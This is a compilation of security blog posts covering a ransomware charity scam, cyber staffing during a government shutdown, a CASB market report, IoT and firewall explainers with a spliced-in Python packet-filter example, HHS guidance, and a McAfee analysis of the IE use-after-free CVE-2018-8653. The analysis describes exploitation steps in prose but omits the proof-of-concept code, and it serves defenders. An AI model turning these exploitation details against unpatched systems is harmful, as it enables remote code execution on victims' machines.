The post Cybersecurity Is Every Leader’s Job appeared first on The State of Security.

Children’s Charity or CryptoMix? Details on This Ransomware Scam

As ransomware threats become more sophisticated, the tactics cybercriminals use to coerce payments from users become more targeted as well. And now, a stealthy strain is using deceptive techniques to mask its malicious identity. Meet CryptoMix ransomware, a strain that disguises itself as a children’s charity in order to trick users into thinking they’re making a donation instead of a ransom payment. While CryptoMix has used this guise in the past, they’ve recently upped the ante by using legitimate information from crowdfunding pages for sick children to further disguise this scheme.

So, how does CryptoMix trick users into making ransom payments? First, the victim receives a ransom note containing multiple email addresses to contact for payment instructions. When the victim contacts one of the email addresses, the “Worldwide Children Charity Community” responds with a message containing the profile of a sick child and a link to the One Time Secret site. This website service allows users to share a post that can only be read once before it’s deleted. CryptoMix’s developers use One Time Secret to distribute payment instructions to the victim and explain how their contribution will be used to provide medical help to sick children. The message claims that the victim’s data will be restored, and their system will be protected from future attacks as soon as the ransom is paid. In order to encourage the victim to act quickly, the note also warns that the ransom price could double in the next 24 hours.

After the victim makes the payment, the ransomware developers send the victim a link to the decryptor. However, they continue to pretend they are an actual charity, thanking the victim for their contribution and ensuring that a sick child will soon receive medical help.

CryptoMix’s scam tactics show how ransomware developers are evolving their techniques to ensure they make a profit. As ransomware threats become stealthier and more sophisticated, it’s important for users to educate themselves on the best techniques to combat these threats. Check out the following tips to help keep your data safe from ransomware:

  • Back up your data. In order to avoid losing access to your important files, make copies of them on an external hard drive or in the cloud. In the event of a ransomware attack, you will be able to wipe your computer or device and reinstall your files from the backup. Backups can’t always prevent ransomware, but they can help mitigate the risks.
  • Never pay the ransom. Although you may feel that this is the only way to get your encrypted files back, there is no guarantee that the ransomware developers will send a decryption tool once they receive the payment. Paying the ransom also contributes to the development of more ransomware families, so it’s best to hold off on making any payments.
  • Use security software. Adding an extra layer of security with a solution such as McAfee Total Protection, which includes Ransom Guard, can help protect your devices from these types of cyberthreats.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Children’s Charity or CryptoMix? Details on This Ransomware Scam appeared first on McAfee Blogs.

How the government shutdown is influencing cybersecurity jobs

As of this writing, the government shutdown of 2019 is the longest ever in America. The only good news about this situation is that, with each passing day, a new group of people in the country seems to rediscover just how essential government services are, now that they’re unavailable.

The next likely casualty is the government’s stable of cybersecurity talent. Here’s why—and what it might mean for us in the long run.

How much government talent is furloughed?

Some of us might be surprised to learn the federal government has a workforce dedicated solely to cybersecurity. Many of these completely essential institutions and teams are now reduced to skeleton crews. This has the potential for long-lasting harm when it comes to the government’s ability to retain these specialists.

At time of writing, the Department of Homeland Security has furloughed 20 percent of its staff dedicated to “main cyber operations,” as well as administrative and supporting roles. But when you look at the entire cybersecurity apparatus of the federal government, the total potential loss of talent is far greater than the DHS alone. According to a planning document, 43 percent of the entire US cybersecurity workforce is currently furloughed.

Taking the top spot, however, is the National Institute of Standards and Technology, or NIST, with 85 percent of its staff furloughed.

This represents a danger today on a number of levels. But there’s a longer-lasting kind of harm, too, that few are talking about right now.

Will federal employees flock to the private sector?

Some of the more important staff and talent initiatives taken on during the Obama administration concerned the treatment, compensation, and benefits of federal employees and contractors. The goal was to make the public sector (the government) more competitive with the private sector. That’s how corporations retain talent, and it’s how the government can do so as well.

It’s no secret that job prospects for computer scientists, and cybersecurity specialists in particular, are rather cushy right now. Software developers enjoy a median income of more than $100,000 per year.

But now that the government is shut down, Washington, D.C. (and all of our state governments) will struggle even more not only to win talent over from the private sector, but keep it. With paychecks potentially off the table for a while, it’s becoming more likely that this already fragile situation will be pushed to the breaking point.

In an interview with the Washington Post, a former DHS cyber official named Greg Garcia explained the situation: “There’s unpredictability and uncertainty and instability [for DHS cyber employees],” he said. “Add on top of all that not getting paid, and I do not envy them.”

The problem here is one of morale. We have not been trying hard enough in recent years to maintain the government’s competitiveness with industry, and now we’re paying the price.

What does the future hold for cybersecurity talent at the federal level?

The bottom line with this government shutdown, just like with any other, is that sending your employees home without pay, and without a timetable for when their jobs and offices will be back up and running, is a bad way to do business.

What we’re likely to see is a “chilling effect” on the next generation or two of potential government employees. Holding these positions hostage in budget negotiations, positions for which applicants earned degrees and accreditation, is the equivalent of telling them the government isn’t an honorable employer and their talent isn’t valued—and that we don’t care if they take it elsewhere.

And there’s plenty of “elsewhere” for them out there, it turns out. In 2017, there were nearly 300,000 jobs available in the “cyber sciences.” That sounds like a lot of opportunities—but it will actually blossom into a full-blown talent shortage of 1.8 million jobs by 2022.

We don’t really want to be turning people off from this line of work—especially not when the stakes are so high. Moreover, it’s clear the government can’t afford to lose the talent it’s already brought together. There’s not going to be enough of it to go around before too long—and the priorities, arguably, should rest with national security.

Remembering the stakes

Barely a day goes by where we’re not reminded that, just as it has brought us closer together, Internet connectivity has also provided new tools for potential disruptive influences.

Reports are available now detailing the degree to which critical national infrastructure—such as our nuclear and other power plants, water treatment facilities, and electrical grids—are surprisingly vulnerable to domestic as well as foreign hacking attempts. This is a bright and wonderful age, but it’s clear that many of the systems we rely on for civilized living aren’t as safe as they’re supposed to be.

We should remember that even our voting machines are outdated and stand a good chance of being hacked or otherwise tampered with. But while public awareness of these issues has increased, furloughing and devaluing cyber talent at the federal and state levels is not a good way to drum up attention and support for such important issues.

Are there any foreseeable solutions to this problem?

The first solution involves remembering that the US Defense Department, even before the government was shut down, was already losing some 4,000 employees to the private sector every year, a sign that our government was already a dissatisfactory place to work. In point of fact, “dissatisfied” or “very dissatisfied” was how 20 percent of DHS employees described their jobs in a survey that made the rounds in 2018.

Even some of the most critical resources on the Internet have been taken offline by this shutdown. NIST maintains catalogs of government cybersecurity standards that are essential for maintaining webpage uptime and HTTPS certificates. With 85 percent of their staff sitting at home, security certificates will expire and websites will be taken down.

When resources like these are unavailable, the Internet becomes a manifestly less safe place to spend time. And that’s the last thing we want.

The post How the government shutdown is influencing cybersecurity jobs appeared first on Malwarebytes Labs.

Microsoft gains strong customer and analyst momentum in the Cloud Access Security Brokers (CASB) market

After a strong year of product updates and innovations, we're excited to see that Microsoft jumped into the Challenger position in Gartner's 2018 Magic Quadrant for Cloud Access Security Brokers (CASB) and solidified its leadership position in KuppingerCole's 2018 Leadership Compass in the same product category, backed by strong customer adoption rates.

CASBs give organizations the ability to securely embrace the possibilities of their cloud apps and services and they can be crucial in driving a successful cloud security strategy.

While the market for CASB is still relatively young, analyst firm Gartner, Inc. predicts that 60 percent of large enterprises will be using CASB technologies by 2020, with independent forecasts expecting to reach a total addressable market of $7.5 billion in the same timeframe.

We have seen a steep increase in the adoption of Microsoft Cloud App Security across all customer segments, ranging from large enterprises such as global energy leader BP, to smaller organizations such as Affinity Workforce. Our internal estimates show that Microsoft Cloud App Security has a current market share of more than 30 percent in the CASB space. This provides us with insights from billions of signals every day, and direct input from the many organizations that we work with, allowing us to continuously improve the product and react to what we're seeing in the market.

By integrating with leading security, identity, and productivity solutions across Microsoft 365, Microsoft Cloud App Security is uniquely positioned to drive innovation in the CASB space. Recent additions include our native integration with Windows Defender Advanced Threat Protection and our consistent labeling experience via Azure Information Protection. Among many others, these help organizations gain visibility into their cloud apps and services, provide sophisticated analytics to identify and combat cyber threats, and control the travel of sensitive information, equally supporting Microsoft's native cloud services as well as numerous third-party cloud apps and services, such as Dropbox, Salesforce, and others.

Microsoft Cloud App Security's portfolio of native product integrations.

2018 analyst momentum

In Gartner's 2018 report, we significantly improved our positioning and moved along both axes, Completeness of Vision as well as Ability to Execute, up from a Niche Player to a Challenger position. We see the substantial improvement as a testimony to our strong ability to execute against our feature roadmap and the momentum we are gaining with customers.

Magic Quadrant for CASB. Source: Gartner (October 2018)*

In its 2018 report, analyst firm KuppingerCole positions Microsoft as a Leader for the second year in a row. This further emphasizes the strength of our native integrations across Microsoft 365, including Azure Active Directory (Azure AD), Office 365, and Azure Security Center, and the significant customer base of Microsoft Cloud App Security.

Leadership Compass for CASB. Source: KuppingerCole (October 2018)

This year's results confirm Microsoft's strong commitment and rapid progress in this space, and with the progress of the overall market, the importance for organizations to start considering the use of a CASB continues to increase.

Learn more

We made both these 2018 analyst reports available for review. Download the Gartner Magic Quadrant 2018 for CASBs report and the KuppingerCole Leadership Compass 2018 report.

If you're not using Microsoft Cloud App Security, start a free trial today and learn how to get started with our detailed technical documentation.

If you have any suggestions, questions, or comments, please visit us on our Tech Community page.

To stay up to date with our latest product innovations, follow our product blog.

*This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Microsoft gains strong customer and analyst momentum in the Cloud Access Security Brokers (CASB) market appeared first on Microsoft Secure.

How to Secure Your Mid-Size Organization From the Next Cyber Attack

If you are responsible for the cybersecurity of a medium-sized company, you may assume your organization is too small to be targeted. Well, think again. While the major headlines tend to focus on large enterprises getting breached – such as Sony, Equifax, or Target – the reality is that small and mid-sized companies are experiencing similar threats. According to Verizon’s 2018 Data

Addressing The Elephant in the Room: Cybersecurity’s Increasing Talent Shortage

The cybersecurity space is in dire straits. Hackers are getting smarter and more sophisticated…and the availability of skilled men and women to combat them has never been lower. It’s an issue that’s been slowly growing worse year over year, yet there’s no clear solution in sight. What’s a business leader to do? The good news […]

The post Addressing The Elephant in the Room: Cybersecurity’s Increasing Talent Shortage appeared first on The State of Security.

What is the Internet of Things

We are constantly connected in the world we live in today. Picture a typical “connected” day as it is today. We ask “Alexa” the weather forecast in the morning and Google Home to start a timer as we get breakfast started. Then, we head for our morning jog, our every step tracked on a Fitbit. The Internet of Things is everywhere and has become a part of our daily routine.

What is the Internet of Things (IoT)?

We have all heard this term, and to many, it feels a bit ambiguous. IoT, or the Internet of Things, refers to any device that is connected to the internet and is collecting or sharing data. The machine-to-machine (M2M) data generated by IoT devices has an array of uses, but it is most commonly used to determine the health and status of things.

It includes everything from coffee makers and cellphones to washing machines, wearable devices and headphones. For example, a coffee maker can tell you when coffee is ready, wearable devices monitor your health and a washing machine can let your phone know when a load is finished.

It also applies to components of machines, like the jet engine of an airplane. If a device has an on/off switch and can connect to the internet, it can most likely be part of the IoT. By combining one’s connected devices with automated systems, it’s possible to gather information about the user and learn from a process.

Examples of Internet of Things Devices:

  • Wearable devices
  • Connected cars
  • Intelligent personal assistant
  • Smart farming
  • Light bulb connected via an app
  • Smart thermostat
  • Connected toy

The History of IoT

The idea of adding intelligence to standard objects has been discussed since the 1980s. In films, “smart devices” were seen as the way of the future. In Back to the Future II, the McFly family uses glasses that serve as a precursor to the Google Glass. The 1990 film Total Recall uses a self-driving car to take Arnold Schwarzenegger around. Smart House, a Disney film from the ‘90s has a completely computerized home.

Humans were curious about the Internet of Things but did not quite have the technology. One early example of IoT is a Coke machine in the early 1980s that allowed programmers to check whether Coke was available in the machine before walking to it. In 1990, John Romkey showed that a toaster could be turned on and off over the internet.

The term Internet of Things was first coined by Kevin Ashton during a presentation he made to Procter & Gamble in 1999. He pushed the importance of radio frequency identification to the company and titled his presentation “Internet of Things,” tying his talk to the internet, one of the hottest trends of the late ‘90s.

That’s when connected devices began to take off. In 1995, less than 1% of the world’s population had internet access. As of December 2017, more than 54% of the population has internet access. There are 8.5 billion smart devices connected to the internet, with that number increasing substantially each day.

How the Internet of Things Works

In the Internet of Things, each device has a different purpose. Many are used for collecting data. For example, a wearable device that tracks your daily steps and heart rate helps you monitor your health.

There are three “layers” involved in operating IoT devices: the dashboard, the cloud and your devices.

The device sends its signal to the cloud, to which other devices also send their information. The cloud is where all the machines interact with each other. From there, the information is sent to your dashboard, which is where you control your device.

The Internet of Things Ecosystem

The IoT ecosystem refers to all of the components that enable businesses, consumers and the government to connect to their IoT devices. It has been named “the next Industrial Revolution” as it has already begun changing the way people live, work and travel. Business Insider has been tracking the growth of the IoT for more than two years and created an exhaustive report on the IoT ecosystem. We added some of the key results below.

  • There will be 34 billion devices connected to the internet by 2020.
  • IoT can lower operating costs, increase productivity and expand to new markets for businesses.
  • Nearly $6 trillion will be spent on IoT solutions within the next five years.

Industries Affected by Internet of Things

While IoT is expected to help everyday consumers stay connected and track their lives, there are several industries that will also benefit from IoT.

These include but are not limited to:

  • Agriculture
  • Infrastructure
  • Manufacturing
  • Defense
  • Retail
  • Banks
  • Oil and mining
  • Insurance
  • Connected homes/smart buildings
  • Utilities
  • Smart cities
  • Healthcare

Major IoT Companies

Hundreds of companies have created devices that link to the Internet of Things and the number will continue to increase in the years to come. Below, we list some of the companies that stand out in the IoT revolution.

  • DHL
  • Amazon
  • Magneto IT Solutions
  • Microsoft
  • HQSoftware
  • Google
  • IBM
  • GE
  • Verizon
  • Fitbit
  • Jasper
  • Cisco
  • Honeywell

The Future of IoT

This new world of connected devices allows our environment, including our home and work life, to become smarter and more measurable. Smart speakers make it easy to play music, get quick facts or set a timer. Home security systems make it easy to monitor your home while you’re away. Smart cars can help us dial numbers and text hands-free, potentially saving thousands of lives. So what’s next for IoT?

A report from Samsung states that the need to secure every connected device by 2020 is critical. Brian Solis from Altimeter Group who worked on future IoT research, states that companies will indulge in digital Darwinism where we learn to rapidly evolve. IoT is also beginning to integrate its data into artificial intelligence systems which take that IoT data and use it to make predictions. For example, Google uses an AI to run its data center cooling system.

Another way IoT is changing the future? Smart city projects are becoming a key feature of IoT. Using data collection sensors over a town or city, planners can get an accurate idea of what’s happening in real time. This could prevent heavy traffic, detect water leakages and locate items in a large warehouse or harbor.

Many cities have begun implementing smart city projects. Barcelona has implemented sensor technology in the irrigation system to detect water quality for plants. Stockholm uses energy-efficient buildings, traffic monitoring and the development of e-services (vs. paper).

Staying Secure

IoT is revolutionizing the workplace and how we live on a day-to-day basis. Smart cities are popping up around the world and smart homes give us the capability to ask a question and receive an answer anywhere at any time. While it’s fantastic to stay connected 24/7, it’s important to keep in mind the potential risks and security concerns.

As more connected devices continue to make their way into our daily routines, we are also more vulnerable to hacking. Because the technology is relatively new it’s important to keep in mind that connected devices are not foolproof. Below, we list the top ways to stay secure using Internet of Things devices including using a VPN to encrypt data and remembering to update software regularly.

Sources:

Business Insider | Think Mobiles | Cloudwares | ZDNet | Forbes | Wired | Business Insider | Internet of Things Agenda | IoT For All

The post What is the Internet of Things appeared first on Panda Security Mediacenter.

What is a firewall?

You’ve probably heard the word “firewall” a few times in recent years. There was even a 2006 Hollywood movie of the same name starring Harrison Ford, Paul Bettany and Virginia Madsen.

But what is a firewall, and why do they matter?

Keeping the bad guys out

At the most basic level, a firewall is a system that prevents unauthorised access to a network. The firewall acts like a bouncer at the entrance to the network, checking the identification of everyone who tries to enter. Any unauthorised access attempt is blocked automatically.

How does a firewall work?

Before you can properly understand why firewalls matter, you first need to understand a tiny bit about how data is sent between computers.

Say you email a document to a colleague. Your computer splits the document into tiny pieces called packets, which are then sent one at a time to your colleague’s computer. Each packet contains additional information that tells the recipient’s computer how to rebuild the document from the packets – and where the packets are coming from. This whole process can be completed in a matter of seconds.

Network data transfers aren’t foolproof though. Packets can get corrupted or lost during transfer. Or they can be intercepted and modified by hackers.

A firewall adds an important layer of protection into the data transfer mechanism. The firewall sits between your computer and the recipient’s, checking every packet that passes through. Any network traffic that has been faked, is coming from an unauthorised or unrecognised source, or is otherwise suspicious is blocked automatically.

The firewall does a lot more besides. It monitors all network traffic, preventing hackers from breaking into your computer or other internet-connected devices.

Why do firewalls matter?

In a business environment, the firewall is installed at the edge of the network; all network traffic has to pass through the firewall, and is analysed in transit. And the same is true of application firewalls like those included with Panda Dome that are installed on home computers.

Effective network security works on the principle of blocking suspicious traffic before it reaches your computer. In a corporate network, that means stopping hackers before they can access the network. At home, you need to drop/block bad network traffic before it can reach the data stored on your computer.

A firewall is not the same as antivirus – it does not check to see whether incoming packets contain malware. But it does automatically block the most suspicious network traffic to keep criminals out. Like antimalware systems however, a good firewall is also regularly updated so that it is capable of blocking the latest threats and suspicious activities.
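The behaviour described above (sit between the computer and the network, drop faked or unrecognised sources, let expected replies through, block everything else by default) as an added example; this is illustrative code written for this page, not Panda Dome's firewall. Addresses, rules and packets are constructed, and the rule syntax is an assumption.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Set, Tuple


@dataclass(frozen=True)
class Packet:
    """One packet reduced to the header fields a packet filter looks at."""
    src: str
    dst: str
    sport: int
    dport: int
    proto: str  # "tcp" or "udp"


@dataclass(frozen=True)
class Rule:
    """Filter rule; first match wins. A field left as None matches anything."""
    action: str                    # "allow" or "block"
    src_net: Optional[str] = None  # CIDR the packet source must fall in
    dport: Optional[int] = None
    proto: Optional[str] = None

    def matches(self, pkt: Packet) -> bool:
        if self.src_net is not None and ip_address(pkt.src) not in ip_network(self.src_net):
            return False
        if self.dport is not None and pkt.dport != self.dport:
            return False
        if self.proto is not None and pkt.proto != self.proto:
            return False
        return True


class Firewall:
    def __init__(self, home_net: str, rules: List[Rule]):
        self.home_net = ip_network(home_net)
        self.rules = rules
        # Connections the protected side opened: (remote ip, remote port, local ip, local port, proto)
        self.established: Set[Tuple[str, int, str, int, str]] = set()

    def outbound(self, pkt: Packet) -> str:
        """Traffic leaving the protected host is remembered so its replies can come back."""
        self.established.add((pkt.dst, pkt.dport, pkt.src, pkt.sport, pkt.proto))
        return "allow"

    def inbound(self, pkt: Packet) -> Tuple[str, str]:
        """Decide on a packet arriving from the network; returns (action, reason)."""
        # A packet from outside that claims an inside address has been faked: drop it first.
        if ip_address(pkt.src) in self.home_net:
            return "block", "spoofed internal source"
        # A reply to a connection we opened is expected traffic.
        if (pkt.src, pkt.sport, pkt.dst, pkt.dport, pkt.proto) in self.established:
            return "allow", "reply to established connection"
        for index, rule in enumerate(self.rules):
            if rule.matches(pkt):
                return rule.action, f"matched rule {index}"
        # Unrecognised sources never get through: default deny.
        return "block", "default deny"


def demo() -> List[Tuple[str, str]]:
    """Run constructed traffic through a small rule set (documentation address ranges)."""
    fw = Firewall("192.168.1.0/24", [
        Rule("allow", src_net="192.0.2.0/24", dport=22, proto="tcp"),  # trusted admin network
        Rule("block", src_net="203.0.113.0/24"),                       # known-bad range
    ])
    # The protected host opens an HTTPS connection to a web server.
    fw.outbound(Packet("192.168.1.10", "198.51.100.25", 51000, 443, "tcp"))
    inbound = [
        Packet("198.51.100.25", "192.168.1.10", 443, 51000, "tcp"),  # genuine reply
        Packet("198.51.100.25", "192.168.1.10", 443, 51001, "tcp"),  # same server, unsolicited
        Packet("192.0.2.7", "192.168.1.10", 40000, 22, "tcp"),       # SSH from trusted range
        Packet("203.0.113.9", "192.168.1.10", 40000, 22, "tcp"),     # SSH from blocked range
        Packet("192.168.1.99", "192.168.1.10", 40000, 22, "tcp"),    # spoofed internal source
        Packet("8.8.8.8", "192.168.1.10", 53, 53, "udp"),            # unsolicited, no rule
    ]
    return [fw.inbound(p) for p in inbound]


if __name__ == "__main__":
    for decision in demo():
        print(decision)
```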

And this automated checking is an important tool for raising the overall level of protection for your home computer and data.

To learn more about firewalls, please take a look at the Panda knowledgebase. And if you’d like to protect your computer with a firewall now, please download a free trial of Panda Dome Security.


The post What is a firewall? appeared first on Panda Security Mediacenter.

IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653

Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received an update to detect the threat shortly after the patch was released.

A remote attacker can target Internet Explorer Versions 9 through 11 via a specially crafted website, while a local attacker on a rogue network could also target the Web Proxy Auto-Discovery service, which uses the same vulnerable scripting engine (jscript.dll). Microsoft Edge is not affected; however, other Windows applications that include the scripting engine might be vulnerable until the security patch from Microsoft is applied.

Context

Vulnerabilities targeting Internet Explorer that can be triggered either remotely or locally are prime tools for cybercriminals to compromise many unpatched computers. That is why criminals usually integrate those vulnerabilities into exploit kits, which propagate malware or conduct other nefarious activities against compromised hosts. The threat of exploit kits is one reason to track this type of vulnerability and to ensure all security patches are deployed in a timely manner. In 2018, more than 100 memory corruption vulnerabilities were found in a Microsoft scripting engine (either for Internet Explorer or Edge). See the MITRE website for more details. (For defense-in-depth, products such as McAfee Endpoint Security or McAfee Host Intrusion Prevention can detect and eradicate such threats until patches can be applied.)

Once a CVE ID is released, cybercriminals can take as little as a few weeks (or in some cases days) to integrate it into their exploit kit. For example, CVE-2018-8174 was initially reported to Microsoft in late April by two teams of threat researchers who had observed its exploitation in the wild. Microsoft published an advisory within a week, in early May. Meanwhile, the researchers published their security analysis of the exploit. Only two weeks later a proof-of-concept exploit was publicly released. In the next couple of weeks exploit kits RIG and Magnitude integrated their weaponized versions of the exploit. (A more detailed timeline can be found here.)

It took less than a month for cybercriminals to weaponize the vulnerability initially disclosed by Microsoft; therefore, it is critical to understand the threat posed by these attack vectors, and to ensure counter measures are in place to stop the threat before it can do any damage.

Technical details

The IE scripting engine jscript.dll is a code base that has been heavily audited.

It is no surprise that exploitable bugs are becoming more exotic. This is the case for CVE-2018-8653, which takes three seemingly innocent behaviors and turns them into a use-after-free flaw. A Microsoft-specific extension triggers a rarely explored code path that eventually misbehaves and invokes a frequently used function with unusual arguments. This leads to the use-after-free condition that was exploited in the wild.

The enumerator object: The entry point for this vulnerability is a Microsoft-specific extension, the enumerator object. It offers an API to enumerate opaque objects that belong to the Windows world (mostly ActiveX components, such as a file system descriptor used to list drives on a system). However, it can also be called on a JavaScript array. In this situation, one can access the array member as usual, but objects created this way are stored slightly differently in memory. This is the cause of interesting side effects.

The objects created by calling the Enumerator.prototype.item() function are recognized as an ActiveXObject and, as seen in the creation of eObj, we can under certain circumstances overwrite the “prototype” member that should have been a read-only property.

Unexpected side effect: The ability to overwrite the prototype member of an ActiveXObject can seem innocuous at first, but it can be leveraged to explore a code path that should not be reachable.

When using the “instanceof” keyword, we can see that the right side of the keyword expects a function. However, with a specially crafted object, the instanceof call succeeds and, worse, we can control the code being executed.

The edge case of invoking instanceof on a specially crafted ActiveXObject gives us the opportunity to run custom JavaScript code from a callback we control, which is typically an error-prone situation.

Attackers successfully turned this bug into a use-after-free condition, as we shall see next.

Exploiting the bug: Without getting into too much detail (see the proof of concept later in this document for more info), this bug can be turned into a “delete this” type of primitive, which resembles previously reported bugs.

When the callback function (“f” in our previous example) is invoked, the keyword “this” points to eObj.prototype. If we set it to null and then trigger a garbage collection, the memory backing the object can be freed and later reclaimed. However, as mentioned in the Project Zero bug report, to be successful an entire block of variables needs to be cleared before the memory is freed.

The out-of-band patch: Microsoft released an unscheduled patch to fix this vulnerability. It is common practice for us to look at what changed before and after the patch. Interestingly, this patch changes the strict minimum number of bytes, while the version number of the DLL remains unchanged.

Using the popular diffing tool Diaphora, we compared the two versions of jscript.dll for Windows 10 x64 (feature release 1809).

We can see that only a few functions were modified. All but one are array-related functions. Those were probably patches addressing CVE-2018-8631 (jscript!JsArrayFunctionHeapSort out-of-bounds write). The only remaining function that was substantially modified is NameTbl::InvokeInternal.

Diaphora provides us with a diff of the assembly code of the two versions of the function. In this instance, it is easier to compare the functions side by side in IDA Pro to see what has changed. A quick glance toward the end of the function shows the introduction of two calls to GCRoot::~GCRoot (the destructor of the object GCRoot).

Looking at the implementation of ~GCRoot, we see it is the same code as that inlined in that function created by the compiler in the older version of the DLL.

In the newer version of the DLL, this function is called twice, while in the unpatched version the code was called only once (inlined by the compiler, hence the absence of a function call). In C++ parlance, ~GCRoot is the destructor of GCRoot, so we may want to find the constructor of GCRoot. An easy trick is to notice the magic offset 0x3D0 and check whether this value is used anywhere else. We find it near the top of the same function (the unpatched version is on the left).

Diving into the nitty gritty of garbage collection for jscript.dll is beyond the scope of this post, so let’s make some assumptions. In C++/C#, GCRoot would usually designate a template that keeps track of references pointing to an object in use, so that those objects are not garbage collected. Here it looks as though stack addresses (aka local variables) are being saved into a list of GCRoot objects to tell the garbage collector not to collect the objects whose pointers sit at those specific locations on the stack. In hindsight this makes sense: we were able to “delete this” because “this” was not tracked by the garbage collector, so now Microsoft makes sure to specifically add that stack variable to the tracked elements.

We can verify this hypothesis by tracing the code around an invocation of instanceof. It turns out that just before invoking our custom “isPrototypeOf” callback function, a call to NameTbl::GetVarThis stores a pointer in the newly “protected” stack variable and then invokes ScrFncObj::Call to execute our callback.

Looking at unexpected behavior in `instanceof`: Curious readers might wonder why it is possible to invoke instanceof on a custom object rather than on a function (as described previously). When instanceof is invoked in JavaScript, the CScriptRuntime::InstOf function is called behind the scenes. Early on, the function distinguishes two cases. If the variable type is 0x81 (which seems to be a broad type for a JavaScript object on the heap), then it invokes a virtual function that returns true/false depending on whether the object can be called. On the other hand, if the type is not 0x81, a different path is followed: it tries to automatically resolve the prototype object and invoke isPrototypeOf.

The 0x81 path:

The not 0x81 path:


Proof of concept

Now that we have seen the ins and outs of the bug, let’s look at a simple proof of concept that exhibits the use-after-free behavior.

First, we set up a couple of arrays, so that everything that can be preallocated is allocated, and the heap is in a somewhat ready state for the use after free.

Then, we declare our custom callback and trigger the vulnerability:

For some reason, the objects array needs to be freed and garbage collected before the next step of the exploit. This could be due to some side effect of freeing the ActiveXObject. The memory is reclaimed when we assign “1” to the property reallocPropertyName. That variable is a magic string that will be copied over the recently freed memory to mimic legitimate variables. It is created as shown:

The 0x0003 is a variable type that tells us the following value is an integer and that 1337 is its value. The string needs to be long enough to trigger an allocation of the same or similar size as the memory block that was recently freed.

To summarize, JavaScript variables (here, the RegExp objects) are stored in a block; when all the variables from the block are freed, the block itself is freed. In the right circumstances, the newly allocated string can take the place of the recently freed block, and because “this” is still dangling in our callback, it can be used for some type confusion. (This is the method used by the attackers, but beyond the scope of this post.) In this example, the code will print 1337 instead of an empty RegExp.

McAfee coverage

Please refer to the McAfee product bulletin for full coverage updates. Here is a short summary of current product coverage as of this writing.

Endpoint products: Endpoint Security (ENS), ENS Adaptive Threat Protection (ENS-ATP), Host Intrusion Prevention (HIPS), VirusScan Enterprise (VSE), WSS.

  • ENS (10.2.0+) with Exploit Prevention
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • HIPS (8.0.0+)
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • ENS (all versions) and WSS (all versions). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V3 DAT (3564)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a
  • VSE (8.8+). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V2 DAT (9113)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a

Content summary

  • DATs: V2 DAT (9113), V3 DAT (3564)
  • Generic Buffer Overflow Protection Signature ID 428

MITRE score

The base score (CVSS v3.0) for this vulnerability is 7.5 (High) with an impact score of 5.9 and an exploitability score of 1.6.

Conclusion

CVE-2018-8653 targets multiple versions of Internet Explorer and other applications that rely on the same scripting engine. Attackers can execute arbitrary code on unpatched hosts from specifically crafted web pages or JavaScript files. Even though the bug was recently fixed by Microsoft, we can expect exploit kits to soon deploy a weaponized version of this critical vulnerability, leveraging it to target remaining unpatched systems. The technical analysis in this post should provide enough information for defenders to ensure their systems will withstand the threat and to know which primitives to look for as an entry point for the attack. McAfee security products can be leveraged to provide specific “virtual patching” for this threat until full software patches can be deployed, while current generic buffer overflow protection rules can be used to fingerprint exploit attempts against this and similar vulnerabilities.

The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs.

HHS Publishes Health Industry Cybersecurity Practices

The U.S. Department of Health and Human Services (“HHS”) recently announced the publication of “Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients” (the “Cybersecurity Practices”). The Cybersecurity Practices were developed by the Healthcare & Public Health Sector Coordinating Council’s Public-Private Partnership, a group comprised of over 150 cybersecurity and healthcare experts from government and private industry.

The Cybersecurity Practices are currently composed of four volumes: (1) the Main Document, (2) a Technical Volume of cybersecurity practices for small healthcare organizations, (3) a Technical Volume of cybersecurity practices for medium and large healthcare organizations, and (4) a Resources and Templates Volume. The Cybersecurity Practices also will include a Cybersecurity Practices Assessments Toolkit, but that is still under development.

The Main Document provides an overview of prominent cyber attacks against healthcare organizations and statistics on the costs of such attacks—such as that in 2017, cyber attacks cost small and medium-sized businesses an average of $2.2 million—and lists the five most common cybersecurity threats that impact the healthcare industry: (1) email phishing attacks, (2) ransomware attacks, (3) loss or theft of equipment or data, (4) insider, accidental or intentional data loss and (5) attacks against connected medical devices that may affect patient safety. The Main Document describes real world scenarios exemplifying each threat, lists “Threat Quick Tips,” analyzes the vulnerabilities that lead to such threats, discusses the impact of such threats and provides practices for healthcare organizations (and their employees) to consider to counter such threats. The Main Document concludes by noting that it is essential for healthcare organizations and government to distribute “relevant, actionable information that mitigates the risk of cyber-attacks” and argues for a “culture change and an acceptance of the importance and necessity of cybersecurity as an integrated part of patient care.”

The two Technical Volumes list the following 10 cybersecurity practices for small, medium and large healthcare organizations:

  • email protection systems;
  • endpoint protection systems;
  • access management;
  • data protection and loss prevention;
  • asset management;
  • network management;
  • vulnerability management;
  • incident response;
  • medical device security; and
  • cybersecurity policies.

The Technical Volumes also list cybersecurity sub-practices and advice for healthcare organizations to follow, with the noted distinction that small healthcare organizations are focused on cost-effective solutions while medium and large organizations may have more “complicated ecosystems of IT assets.”

